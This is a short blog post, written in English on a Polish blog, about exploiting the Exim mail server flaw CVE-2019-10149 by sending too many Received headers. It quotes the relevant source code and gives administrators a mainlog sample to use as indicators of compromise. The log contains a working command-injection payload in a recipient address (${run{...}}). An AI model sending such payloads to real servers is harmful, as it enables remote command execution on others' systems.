wtorek, 11 czerwca 2019

(ENG) Emacs through sendmail - exploiting CVE-2019-10149

Tekst wyjątkowo jest w języku angielskim

  Before you start reading, please read article on lwn, if you have not already done so. The 24-hour mark described within the article passed long time ago, and still no further details were published. As stated, vulnerability is trivially exploitable, but discovering it in actual code, not necessary. I believe that because of it's simplicity, actual exploit is in active use, and indicators of compromise are unknown for system administrators. This leads to situation where after patching your services, you don't know whatever your systems have been compromised or not. These are reasons why I decided to post some further details about this vulnerability.

  As it appears from the published information, to trigger bug we need to set process_recipients variable to some other value than RECIP_ACCEPT. It can be done earlier in the deliver_message() function by following code:
5716 else if (received_count > received_headers_max)
5717   process_recipients = RECIP_FAIL_LOOP;

So it's only matter of sending excess amount of Received headers.
# exim -bP received_headers_max
received_headers_max = 30

Bringing it all together, the successful attack leaves traces that looks similar to those below, from my exim's mainlog:
1hbNcz-0001gv-Cm <= adrb@localhost H=localhost [::1] P=esmtp S=1732
1hbNcz-0001gv-Cm ** ${run{\x2fbin\x2ftouch\x20\x2ftmp\x2ftest}}@localhost: Too many "Received" headers - suspected mail loop
1hbNdK-0001l5-89 <= <> R=1hbNcz-0001gv-Cm U=Debian-exim P=local S=2969
1hbNcz-0001gv-Cm Completed
1hbNdK-0001l5-89 => adrb R=local_user T=mail_spool 
1hbNdK-0001l5-89 Completed

Update: You can read about that vulnerability in full details here